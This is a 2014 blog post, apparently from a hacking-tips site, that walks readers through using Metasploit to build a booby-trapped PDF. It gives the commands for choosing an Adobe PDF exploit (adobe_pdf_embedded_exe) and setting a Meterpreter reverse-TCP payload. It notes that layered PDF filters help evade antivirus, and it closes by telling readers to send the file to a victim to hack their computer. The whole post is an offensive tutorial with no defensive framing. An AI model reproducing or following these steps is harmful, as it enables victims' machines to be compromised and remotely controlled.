IconIcon

Monday 11 August 2014

How to hide exploits behind pdf files?

Welcome to techntips.net 
    
Recently we published how to hack computer using USB drive.
Today, we are going to publish how hackers hide exploits behind PDF files.  


There are many techniques used to hide malwares or exploits behind PDF. Now, let's talk about different techniques to achieve this task.

We will also discuss some tricks used to avoid detection by almost all major antivirus scanners.

You can use metasploit framework to bind your exploit behind pdf files. This is simplest technique used by novice hackers.

Now let's talk how it works?

PDF files allow several filters to be used on raw data, either singly or in conjunction with each other. Anyone can create PDF files where the data uses five different filters, or even multiple layers of the same filter. This allows hackers to bind exploits inside the filters, which makes these exploits possibly undetectable my most antivirus.
 These exploits works mostly on Adobe Acrobat Reader and may not work on other PDF viewers.
Avast was first antivirus which detected PDF files exploits.

Now let's see how to hide exploits behind PDF files:--

Step1:-- Download and Install Metasploit.

Step2:-- Now, install Adobe Reader.

Step3:-- Start - Metasploit, and type below code.
           search type:exploit platform:windows adobe pdf

Step4:-- Above code will list all exploits that will
             work on current version of Adobe reader.
             You can choose any exploit you want.
            Now, to use exploit, use below code.

          Syntax- use  exploit_name 
            Example:-- use exploit/windows/fileformat/adobe_pdf_embedded_exe   

Step5:-- To know information about exploit you
               want to use, type below code in 
              metasploit. 
                  Syntax:-- exploit (exploit_name )>info
              Example:-- exploit (adobe_pdf_embedded_exe) > info   

Step6:-- Now, you need to set payload to embed exploit in PDF.
               Use below code to set payload.
   Syntax:-- exploit (exploit_name) > set payload windows/meterpreter/reverse_tcp

Example:-- exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp     

Step7:-- Now, you need to check options available for exploit and payload.
              Syntax:-- exploit (exploit_name) > show options
              Example:--exploit (adobe_pdf_embedded_exe) > show options   

Step8:-- Now run code according to your exploit and payload options to install exploit in PDF 
               file. At last, you need to run below code to create a PDF file with exploit.   
               Syntax:--   exploit (exploit_name) > exploit
               Example:-- exploit (adobe_pdf_embedded_exe) > exploit
  

 Now you can send your PDF file to victim to hack their computer.

Subscribe to stay updated with us.

 

0 comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...